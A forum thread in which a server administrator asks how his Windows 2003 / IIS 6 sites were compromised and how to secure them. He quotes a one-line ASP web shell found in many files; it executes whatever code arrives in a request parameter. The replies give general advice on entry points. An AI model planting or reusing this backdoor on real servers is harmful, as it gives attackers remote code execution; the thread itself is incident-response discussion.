# I think ive been hacked and looking for advice

Tags: iis-6, windows-server-2003

One of my clients noticed a message in google search results that said their website may have been hacked.  After some digging, I found html files on the server that contained seo garbage and javascript references.  I removed those files, change cms passwords, updated some components like CKFinder, etc...

I then started looking into other sites on the server and found tons of .asp files with this line

```
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
```

I've removed those but do not know how they got there.  I've looked through various logs (event viewer, website, ftp) but most don't go back far enough from when the files were created.

I've updated the OS, which was only a month or two out of date, and changed ftp access.

What else can I do to find the point of entry or make sure my server and sites are safe?

BTW: This is a windows 2003 server running IIS 6.0.

Comment: Windows 2003 is "only a month or two out of date"?

Comment: Referring to windows updates...

Answer (score 0):

There is multiple ways that they may have gotten access to your server.

Are you running a common CMS or custom? 
It could be possible that they have found a vulnerability in one of your scripts.

for example if they found a SQL injection vulnerability they could retrive database information.
if they where to find a RCE bug (remote code execution) they maybe have been able to execute system commands leading to the creating of those arbitrary files.

Other than that, there are a few vulnerabilities in windows server that have been patched this week, check out this link :
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html